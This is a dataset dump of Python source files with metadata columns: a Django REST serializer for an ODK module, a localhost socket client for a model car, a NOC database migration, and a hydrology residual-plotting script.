hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | 
qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
21c4e67bcec2a79afa2f1eebd700ab15449d0b2d | 4,665 | py | Python | aether-odk-module/aether/odk/api/serializers.py | lordmallam/aether | 7ceb71d2ef8b09d704d94dfcb243dbbdf8356135 | [
"Apache-2.0"
] | null | null | null | aether-odk-module/aether/odk/api/serializers.py | lordmallam/aether | 7ceb71d2ef8b09d704d94dfcb243dbbdf8356135 | [
"Apache-2.0"
] | null | null | null | aether-odk-module/aether/odk/api/serializers.py | lordmallam/aether | 7ceb71d2ef8b09d704d94dfcb243dbbdf8356135 | [
"Apache-2.0"
] | null | null | null | # Copyright (C) 2018 by eHealth Africa : http://www.eHealthAfrica.org
#
# See the NOTICE file distributed with this work for additional information
# regarding copyright ownership.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from django.contrib.auth import get_user_model
from django.contrib.auth.password_validation import validate_password as validate_pwd
from django.utils.translation import ugettext as _
from drf_dynamic_fields import DynamicFieldsMixin
from rest_framework import serializers
from .models import Project, XForm, MediaFile
from .xform_utils import parse_xform_file, validate_xform
from .surveyors_utils import get_surveyors, flag_as_surveyor
class MediaFileSerializer(DynamicFieldsMixin, serializers.ModelSerializer):
name = serializers.CharField(allow_null=True, default=None)
class Meta:
model = MediaFile
fields = '__all__'
class XFormSerializer(DynamicFieldsMixin, serializers.ModelSerializer):
url = serializers.HyperlinkedIdentityField('xform-detail', read_only=True)
project_url = serializers.HyperlinkedRelatedField(
'project-detail',
source='project',
read_only=True
)
surveyors = serializers.PrimaryKeyRelatedField(
label=_('Surveyors'),
many=True,
queryset=get_surveyors(),
allow_null=True,
default=[],
help_text=_('If you do not specify any surveyors, EVERYONE will be able to access this xForm.'),
)
xml_file = serializers.FileField(
write_only=True,
allow_null=True,
default=None,
label=_('XLS Form / XML File'),
help_text=_('Upload an XLS Form or an XML File'),
)
# this will return all media files in one request call
media_files = MediaFileSerializer(many=True, read_only=True)
def validate(self, value):
if value['xml_file']:
try:
# extract data from file and put it on `xml_data`
value['xml_data'] = parse_xform_file(
filename=str(value['xml_file']),
content=value['xml_file'],
)
# validate xml data and link the possible errors to this field
validate_xform(value['xml_data'])
except Exception as e:
raise serializers.ValidationError({'xml_file': str(e)})
value.pop('xml_file')
return super(XFormSerializer, self).validate(value)
class Meta:
model = XForm
fields = '__all__'
class SurveyorSerializer(DynamicFieldsMixin, serializers.ModelSerializer):
password = serializers.CharField(style={'input_type': 'password'})
def validate_password(self, value):
validate_pwd(value)
return value
def create(self, validated_data):
password = validated_data.pop('password', None)
instance = self.Meta.model(**validated_data)
instance.set_password(password)
instance.save()
flag_as_surveyor(instance)
return instance
def update(self, instance, validated_data):
for attr, value in validated_data.items():
if attr == 'password':
if value != instance.password:
instance.set_password(value)
else:
setattr(instance, attr, value)
instance.save()
flag_as_surveyor(instance)
return instance
class Meta:
model = get_user_model()
fields = ('id', 'username', 'password', )
class ProjectSerializer(DynamicFieldsMixin, serializers.ModelSerializer):
url = serializers.HyperlinkedIdentityField('project-detail', read_only=True)
surveyors = serializers.PrimaryKeyRelatedField(
label=_('Surveyors'),
many=True,
queryset=get_surveyors(),
allow_null=True,
default=[],
help_text=_('If you do not specify any surveyors, EVERYONE will be able to access this project xForms.'),
)
# this will return all linked xForms with media files in one request call
xforms = XFormSerializer(read_only=True, many=True)
class Meta:
model = Project
fields = '__all__'
| 33.321429 | 113 | 0.674384 | 537 | 4,665 | 5.709497 | 0.348231 | 0.018265 | 0.019569 | 0.026093 | 0.236791 | 0.221135 | 0.150685 | 0.150685 | 0.119374 | 0.119374 | 0 | 0.002263 | 0.242229 | 4,665 | 139 | 114 | 33.561151 | 0.865064 | 0.198928 | 0 | 0.288889 | 0 | 0 | 0.111709 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044444 | false | 0.1 | 0.088889 | 0 | 0.377778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
21c5953806a590d303da60ce30af9e05c9ffcf7f | 1,046 | py | Python | client.py | Klark007/Selbstfahrendes-Auto-im-Modell | d7fe81392de2b29b7dbc7c9d929fa0031b89900b | [
"MIT"
] | null | null | null | client.py | Klark007/Selbstfahrendes-Auto-im-Modell | d7fe81392de2b29b7dbc7c9d929fa0031b89900b | [
"MIT"
] | null | null | null | client.py | Klark007/Selbstfahrendes-Auto-im-Modell | d7fe81392de2b29b7dbc7c9d929fa0031b89900b | [
"MIT"
] | null | null | null | import socket
from ast import literal_eval
import Yetiborg.Drive as Yetiborg
HEADERSIZE = 2
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("localhost", 12345)) # 192.168.0.11 / localhost / 192.168.0.108
# car always looks up at the beginning
car = Yetiborg.Yetiborg((0, 1))
"""
fs: finished
"""
def move(vec):
print(vec)
# movement command at motors
car.calculate_movement(vec)
pass
def stop():
print("Stop")
exit()
def command_decoder(command):
    # decodes the received command string into an action
    cmd = command[:2]
    if cmd == "mv":
        # gets the direction (tuple) from the command
        move(literal_eval(command[2:]))
    elif cmd == "en":
        stop()
while True:
full_cmd = ""
header = s.recv(HEADERSIZE).decode("utf-8")
print("New message length:", header[:HEADERSIZE])
cmd_len = int(header[:HEADERSIZE])
full_cmd = s.recv(cmd_len).decode("utf-8")
command_decoder(full_cmd)
# send finished execution signal
s.send(bytes("fs", "utf-8"))
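# Not part of client.py: a minimal sketch of the matching sender side of this
# protocol, assuming the same 2-byte ASCII length header and the "mv"/"en"
# commands handled above (host, port and the example vector are illustrative).
import socket

HEADERSIZE = 2

def send_command(conn, cmd):
    # frame the command with a fixed-width, 2-character length header,
    # matching the HEADERSIZE bytes the client reads first
    conn.send(bytes(str(len(cmd)).zfill(HEADERSIZE), "utf-8"))
    conn.send(bytes(cmd, "utf-8"))

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(("localhost", 12345))
server.listen(1)
conn, addr = server.accept()
send_command(conn, "mv(0, 1)")        # literal_eval on the client turns "(0, 1)" into a tuple
print(conn.recv(2).decode("utf-8"))   # "fs" -- the client reports the move finished
send_command(conn, "en")              # ends the client loop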
| 18.350877 | 75 | 0.637667 | 148 | 1,046 | 4.425676 | 0.513514 | 0.032061 | 0.021374 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.039555 | 0.226577 | 1,046 | 56 | 76 | 18.678571 | 0.770087 | 0.209369 | 0 | 0.068966 | 0 | 0 | 0.066667 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.103448 | false | 0.068966 | 0.103448 | 0 | 0.206897 | 0.103448 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
21cf42098efd959d6275b16af7c4990f494ec81b | 859 | py | Python | inv/migrations/0001_subinterface_managed_object.py | prorevizor/noc | 37e44b8afc64318b10699c06a1138eee9e7d6a4e | [
"BSD-3-Clause"
] | 84 | 2017-10-22T11:01:39.000Z | 2022-02-27T03:43:48.000Z | inv/migrations/0001_subinterface_managed_object.py | prorevizor/noc | 37e44b8afc64318b10699c06a1138eee9e7d6a4e | [
"BSD-3-Clause"
] | 22 | 2017-12-11T07:21:56.000Z | 2021-09-23T02:53:50.000Z | inv/migrations/0001_subinterface_managed_object.py | prorevizor/noc | 37e44b8afc64318b10699c06a1138eee9e7d6a4e | [
"BSD-3-Clause"
] | 23 | 2017-12-06T06:59:52.000Z | 2022-02-24T00:02:25.000Z | # ---------------------------------------------------------------------
# Initialize SubInterface.managed_object
# ---------------------------------------------------------------------
# Copyright (C) 2007-2020 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
# NOC modules
from noc.core.migration.base import BaseMigration
class Migration(BaseMigration):
def migrate(self):
db = self.mongo_db
# interface oid -> managed object id
imo = {
r["_id"]: r["managed_object"]
for r in db.noc.interfaces.find({}, {"id": 1, "managed_object": 1})
}
# Update subinterface managed object id
c = db.noc.subinterfaces
for i_oid in imo:
c.update({"interface": i_oid}, {"$set": {"managed_object": imo[i_oid]}})
| 35.791667 | 84 | 0.463329 | 82 | 859 | 4.743902 | 0.5 | 0.200514 | 0.128535 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014577 | 0.201397 | 859 | 23 | 85 | 37.347826 | 0.552478 | 0.462165 | 0 | 0 | 0 | 0 | 0.132743 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.090909 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
21d04b45422de71cb56cbdb189ae8ae7a0615c7b | 14,224 | py | Python | utils/etrm_stochastic_grid_search/residual_analysis.py | NMTHydro/Recharge | bbc1a05add92064acffeffb19f04e370b99a7918 | [
"Apache-2.0"
] | 7 | 2016-08-30T15:18:11.000Z | 2021-08-22T00:28:10.000Z | utils/etrm_stochastic_grid_search/residual_analysis.py | NMTHydro/Recharge | bbc1a05add92064acffeffb19f04e370b99a7918 | [
"Apache-2.0"
] | 2 | 2016-06-08T06:41:45.000Z | 2016-06-23T20:47:26.000Z | utils/etrm_stochastic_grid_search/residual_analysis.py | NMTHydro/Recharge | bbc1a05add92064acffeffb19f04e370b99a7918 | [
"Apache-2.0"
] | 1 | 2018-09-18T10:38:08.000Z | 2018-09-18T10:38:08.000Z | # ===============================================================================
# Copyright 2019 Jan Hendrickx and Gabriel Parrish
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
import os
import yaml
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
from pandas.plotting import register_matplotlib_converters
register_matplotlib_converters()
from datetime import datetime
# ============= standard library imports ========================
from utils.TAW_optimization_subroutine.timeseries_processor import accumulator
sitename = 'Wjs'
# if applicable
cum_days = '7'
# triggers a specific daterange for plotting specified lower down in script
date_range = True
# root = '/Users/dcadol/Desktop/academic_docs_II/calibration_approach/mini_model_outputs/mpj/calibration_output_II/mpj_7day_eta_cum'
# root = '/Users/dcadol/Desktop/academic_docs_II/calibration_approach/mini_model_outputs/mpj/calibration_output_II/mpj_non_cum_rzsm'
# root = '/Users/dcadol/Desktop/academic_docs_II/calibration_approach/mini_model_outputs/seg/calibration_output_II/seg_cum_eta_1day'
# root = '/Users/dcadol/Desktop/academic_docs_II/calibration_approach/mini_model_outputs/seg/calibration_output_II/seg_7day_eta_cum'
# root = '/Users/dcadol/Desktop/academic_docs_II/calibration_approach/mini_model_outputs/seg/calibration_output_II/seg_non_cum_rzsm'
# root = '/Users/dcadol/Desktop/academic_docs_II/calibration_approach/mini_model_outputs/ses/calibration_output_II/ses_7day_eta_cum'
# root = '/Users/dcadol/Desktop/academic_docs_II/calibration_approach/mini_model_outputs/ses/calibration_output_II/ses_non_cum_rzsm'
# root = '/Users/dcadol/Desktop/academic_docs_II/calibration_approach/mini_model_outputs/wjs/calibration_output_II/wjs_1day_eta_cum'
root = '/Users/dcadol/Desktop/academic_docs_II/calibration_approach/mini_model_outputs/wjs/calibration_output_II/wjs_cum_eta_7day'#wjs_cum_eta_7day
# root = '/Users/dcadol/Desktop/academic_docs_II/calibration_approach/mini_model_outputs/wjs/calibration_output_II/wjs_non_cum_rzsm'
# root = '/Users/dcadol/Desktop/academic_docs_II/calibration_approach/mini_model_outputs_II/seg/calibration_output/seg_rzsm'
# root = '/Users/dcadol/Desktop/academic_docs_II/calibration_approach/mini_model_outputs_II/mpj/calibration_output/mpj_rzsm'
# root = '/Users/dcadol/Desktop/academic_docs_II/calibration_approach/mini_model_outputs_II/vcp/calibration_output/vcp_rzsm'
# root = '/Users/dcadol/Desktop/academic_docs_II/calibration_approach/mini_model_outputs_III/wjs/calibration_output/wjs_rzsm'
chimin_path = os.path.join(root, 'US-{}_chimin_cum_eta_{}.yml'.format(sitename, cum_days))
resid_path = os.path.join(root, 'US-{}_resid_cum_eta_{}.yml'.format(sitename, cum_days))
combined_timeseries_file = 'cum_eta_model_df_{}_cum7.csv'
# chimin_path = os.path.join(root, 'US-{}_chimin_non_cum_rzsm.yml'.format(sitename))
# resid_path = os.path.join(root, 'US-{}_resid_non_cum_rzsm.yml'.format(sitename))
# combined_timeseries_file = 'rzsm_model_df_{}.csv'
var = 'ETa'  # 'ETa' or 'RZSM'
taw = '50'
# starting TAW value
begin_taw = 25
# ending TAW value
end_taw = 925
# grid search step size. Each ETRM run will increase the uniform TAW of the RZSW holding capacity by this many mm.
taw_step = 25
taw_list = []
optimization_dict = {}
for i in range(0, ((end_taw - begin_taw) / taw_step)):
if i == 0:
current_taw = begin_taw
else:
current_taw += taw_step
taw_list.append(current_taw)
with open(chimin_path, 'r') as rfile:
chimin_dict = yaml.load(rfile)
with open(resid_path, 'r') as rfile:
resid_dict = yaml.load(rfile)
print 'residual dict \n', resid_dict
resid_tseries = resid_dict[taw][0]
resid_vals = resid_dict[taw][1]
resid_tseries = [datetime.strptime(str(i)[0:10], '%Y-%m-%d') for i in resid_tseries]
# sort residuals from smallest to largest, keeping each value paired with its timestamp
resid_sorted = sorted(zip(resid_vals, resid_tseries))
# TODO - Grab the PRISM data for the large values on either end of resid_sorted for the pixel...
combined_timeseries_file = combined_timeseries_file.format(taw)
combined_timeseries_path = os.path.join(root, combined_timeseries_file)
combined_df = pd.read_csv(combined_timeseries_path, parse_dates=True, index_col=0, header=0)
print combined_df.iloc[:, 0]
start_date = datetime(2013, 6, 16)
end_date = datetime(2013, 10, 20)
if date_range:
combined_df = combined_df.loc[(combined_df.index >= start_date) & (combined_df.index <= end_date)]
prism = combined_df['prism_values']
resid_large = resid_sorted[0:4] + resid_sorted[-4:]
# plt.plot(combined_df.index.values, prism)
# plt.plot(combined_df.index.values, combined_df['amf_eta_values'])
# plt.plot(combined_df.index.values, combined_df['average_vals_eta'])
# plt.show()
resid_dates = []
resid_vals = []
for resid_tup in resid_large:
val, dt = resid_tup
# print 'dt {}'.format(dt)
# datetime.datetime(dt)
resid_dates.append(dt)
resid_vals.append(val)
df_datelist = [i for i in combined_df.index]
high_outlier_indices = []
for i, d in enumerate(df_datelist):
# print d.year, d.month, d.day
for res_tup in resid_large:
res_val, res_d = res_tup
if (res_d.year, res_d.month, res_d.day) == (d.year, d.month, d.day):
# print 'resday', (res_d.year, res_d.month, res_d.day), 'dday', (d.year, d.month, d.day)
# if res_d == d:
high_outlier_indices.append(i)
print high_outlier_indices
prism = combined_df['prism_values'].tolist()
site_precip = combined_df['amf_precip_values'].tolist()
# site_precip_dates = pd.to_datetime(combined_df['amf_precip_dates']).tolist()
etrm_et = combined_df['average_vals_eta'].tolist()
amf_et = combined_df['amf_eta_values'].tolist()
if var == 'RZSM':
amf_rzsm = combined_df['nrml_depth_avg_sm'].tolist()
etrm_rzsm = combined_df['average_vals_rzsm'].tolist()
etrm_ro = combined_df['average_vals_ro'].tolist()
data_date = df_datelist
# print 'site precip dates \n', site_precip_dates
data_date = [d.to_pydatetime() for d in data_date]
high_outlier_prism = []
high_outlier_etrm = []
high_outlier_amf = []
high_outlier_dates = []
for oi in high_outlier_indices:
precip_outlier = prism[oi]
etrm_et_outlier = etrm_et[oi]
amf_et_outlier = amf_et[oi]
outlier_date = data_date[oi]
high_outlier_prism.append(precip_outlier)
high_outlier_etrm.append(etrm_et_outlier)
high_outlier_amf.append(amf_et_outlier)
high_outlier_dates.append(outlier_date)
##### ================ RESIDUALS PLOT ========================
ax1 = plt.subplot(411)
ax1.set_title('Largest Normalized Residuals in Timeseires')
ax1.set_xlabel('Date')
ax1.set_ylabel('Residual {}'.format(var))
plt.scatter(resid_dates, resid_vals)
plt.grid()
# plt.setp(ax1.get_xticklabels(), fontsize=6)
if var == 'ETa':
ax2 = plt.subplot(412, sharex=ax1)
ax2.set_title('Ameriflux {} and ETRM {}'.format(sitename, var))
ax2.set_xlabel('Date')
ax2.set_ylabel('ETa in mm')
plt.plot(data_date, etrm_et, color='black', label='ETRM')
plt.plot_date(data_date, etrm_et, color='black', fillstyle='none')
plt.plot(data_date, amf_et, color='green', label='AMF')
plt.plot_date(data_date, amf_et, color='green', fillstyle='none')
plt.grid()
plt.legend(loc=(1.01, 0.5))
# # make these tick labels invisible
# plt.setp(ax2.get_xticklabels(), visible=False)
elif var == 'RZSM':
ax2 = plt.subplot(412, sharex=ax1)
ax2.set_title('Ameriflux {} and ETRM {}'.format(sitename, var))
ax2.set_xlabel('Date')
ax2.set_ylabel('RZSM Fraction')
plt.plot(data_date, etrm_rzsm, color='red', label='ETRM')
plt.plot_date(data_date, etrm_rzsm, color='red', fillstyle='none', label=None)
plt.plot(data_date, amf_rzsm, color='purple', label='AMF')
plt.plot_date(data_date, amf_rzsm, color='purple', fillstyle='none', label=None)
plt.grid()
plt.legend(loc=(1.01, 0.5))
# share x and y
ax3 = plt.subplot(413, sharex=ax1)
ax3.set_title('PRISM and Site {} Precipitation'.format(sitename))
ax3.set_xlabel('Date')
ax3.set_ylabel(('Precipitation in mm'))
plt.plot(data_date, prism, color='blue', label='PRISM')
plt.plot_date(data_date, prism, color='blue', fillstyle='none')
plt.plot(data_date, site_precip, color='orange', label='AMF')
plt.plot_date(data_date, site_precip, color='orange', fillstyle='none')
plt.grid()
plt.legend(loc=(1.01, 0.5))
if var == 'RZSM':
# ax4 = plt.subplot(414, sharex=ax1)
# ax4.set_title('ETRM {} Runoff'.format(sitename))
# ax4.set_xlabel('Date')
# ax4.set_ylabel('ETRM Runoff in mm')
# plt.plot(data_date, etrm_ro, color='brown', label='Runoff')
# plt.plot_date(data_date, etrm_ro, color='brown', fillstyle='none')
# plt.grid()
# plt.legend(loc=(1.01, 0.5))
# =====
ax4 = plt.subplot(414, sharex=ax1)
ax4.set_title('Ameriflux {} and ETRM {}'.format(sitename, var))
ax4.set_xlabel('Date')
ax4.set_ylabel('ETa in mm')
plt.plot(data_date, etrm_et, color='black', label='ETRM')
plt.plot_date(data_date, etrm_et, color='black', fillstyle='none')
plt.plot(data_date, amf_et, color='green', label='AMF')
plt.plot_date(data_date, amf_et, color='green', fillstyle='none')
plt.grid()
plt.legend(loc=(1.01, 0.5))
plt.subplots_adjust(hspace=.75) # left, right, bottom, top, wspace, hspace
plt.show()
# ================== PLOTTING INFILTRATION ==================
etrm_infil = combined_df['average_vals_infil'].tolist()
ax1 = plt.subplot(311)
ax1.set_title('infil_timeseries')
ax1.set_xlabel('Date')
ax1.set_ylabel('infiltration {} TAW'.format(var, taw))
plt.plot(data_date, etrm_infil, color='black', label='ETRM')
plt.plot_date(data_date, etrm_infil, color='black', fillstyle='none')
plt.grid()
ax2 = plt.subplot(312, sharex=ax1)
ax2.set_title('Ameriflux {} and ETRM {}'.format(sitename, var))
ax2.set_xlabel('Date')
ax2.set_ylabel('ETa in mm')
plt.plot(data_date, etrm_et, color='black', label='ETRM')
plt.plot_date(data_date, etrm_et, color='black', fillstyle='none')
plt.plot(data_date, amf_et, color='green', label='AMF')
plt.plot_date(data_date, amf_et, color='green', fillstyle='none')
plt.grid()
plt.legend(loc=(1.01, 0.5))
ax3 = plt.subplot(313, sharex=ax1)
ax3.set_title('PRISM and Site {} Precipitation'.format(sitename))
ax3.set_xlabel('Date')
ax3.set_ylabel(('Precipitation in mm'))
plt.plot(data_date, prism, color='blue', label='PRISM')
plt.plot_date(data_date, prism, color='blue', fillstyle='none')
plt.plot(data_date, site_precip, color='orange', label='AMF')
plt.plot_date(data_date, site_precip, color='orange', fillstyle='none')
plt.grid()
plt.legend(loc=(1.01, 0.5))
plt.subplots_adjust(hspace=.75)
plt.show()
# ========================== Plotting Sans Residuals =======================
# plt.setp(ax1.get_xticklabels(), fontsize=6)
if var == 'ETa':
ax2 = plt.subplot(311)
ax2.set_title('Ameriflux {} and ETRM {}'.format(sitename, var))
ax2.set_xlabel('Date')
ax2.set_ylabel('ETa in mm')
plt.plot(data_date, etrm_et, color='black', label='ETRM')
plt.plot_date(data_date, etrm_et, color='black', fillstyle='none')
plt.plot(data_date, amf_et, color='green', label='AMF')
plt.plot_date(data_date, amf_et, color='green', fillstyle='none')
plt.grid()
plt.legend(loc=(1.01, 0.5))
# # make these tick labels invisible
# plt.setp(ax2.get_xticklabels(), visible=False)
elif var == 'RZSM':
ax2 = plt.subplot(311)
ax2.set_title('Ameriflux {} and ETRM {}'.format(sitename, var))
ax2.set_xlabel('Date')
ax2.set_ylabel('RZSM Fraction')
plt.plot(data_date, etrm_rzsm, color='red', label='ETRM')
plt.plot_date(data_date, etrm_rzsm, color='red', fillstyle='none', label=None)
plt.plot(data_date, amf_rzsm, color='purple', label='AMF')
plt.plot_date(data_date, amf_rzsm, color='purple', fillstyle='none', label=None)
plt.grid()
plt.legend(loc=(1.01, 0.5))
# share x and y
ax3 = plt.subplot(312, sharex=ax2)
ax3.set_title('PRISM and Site {} Precipitation'.format(sitename))
ax3.set_xlabel('Date')
ax3.set_ylabel(('Precipitation in mm'))
plt.plot(data_date, prism, color='blue', label='PRISM')
plt.plot_date(data_date, prism, color='blue', fillstyle='none')
plt.plot(data_date, site_precip, color='orange', label='AMF')
plt.plot_date(data_date, site_precip, color='orange', fillstyle='none')
plt.grid()
plt.legend(loc=(1.01, 0.5))
if var == 'RZSM':
# ax4 = plt.subplot(313, sharex=ax2)
# ax4.set_title('ETRM {} Runoff'.format(sitename))
# ax4.set_xlabel('Date')
# ax4.set_ylabel('ETRM Runoff in mm')
# plt.plot(data_date, etrm_ro, color='brown', label='Runoff')
# plt.plot_date(data_date, etrm_ro, color='brown', fillstyle='none')
# plt.grid()
# plt.legend(loc=(1.01, 0.5))
# =====
ax4 = plt.subplot(313, sharex=ax2)
ax4.set_title('Ameriflux {} and ETRM {}'.format(sitename, var))
ax4.set_xlabel('Date')
ax4.set_ylabel('ETa in mm')
plt.plot(data_date, etrm_et, color='black', label='ETRM')
plt.plot_date(data_date, etrm_et, color='black', fillstyle='none')
plt.plot(data_date, amf_et, color='green', label='AMF')
plt.plot_date(data_date, amf_et, color='green', fillstyle='none')
plt.grid()
plt.legend(loc=(1.01, 0.5))
else:
ax4 = plt.subplot(313, sharex=ax2)
ax4.set_title('ETRM {} Runoff'.format(sitename))
ax4.set_xlabel('Date')
ax4.set_ylabel('ETRM Runoff in mm')
plt.plot(data_date, etrm_ro, color='brown', label='Runoff')
plt.plot_date(data_date, etrm_ro, color='brown', fillstyle='none')
plt.grid()
plt.legend(loc=(1.01, 0.5))
plt.subplots_adjust(hspace=.5) # left, right, bottom, top, wspace, hspace
plt.show() | 37.729443 | 147 | 0.710911 | 2,165 | 14,224 | 4.430947 | 0.143187 | 0.043365 | 0.031273 | 0.037527 | 0.647451 | 0.630251 | 0.613677 | 0.601584 | 0.573022 | 0.564266 | 0 | 0.0197 | 0.122118 | 14,224 | 377 | 148 | 37.729443 | 0.748538 | 0.335208 | 0 | 0.531818 | 0 | 0 | 0.143925 | 0.021567 | 0 | 0 | 0 | 0.002653 | 0 | 0 | null | null | 0 | 0.036364 | null | null | 0.013636 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
21d487a575334245b8424e08a0ec1c4d3a7ff96b | 672 | py | Python | src/person/migrations/0004_actors_moved.py | Little-Pogchamp-Team/kinopoisk_on_django | 06e1b5ee14c7e77dd5b69140732461a02bf44566 | [
"MIT"
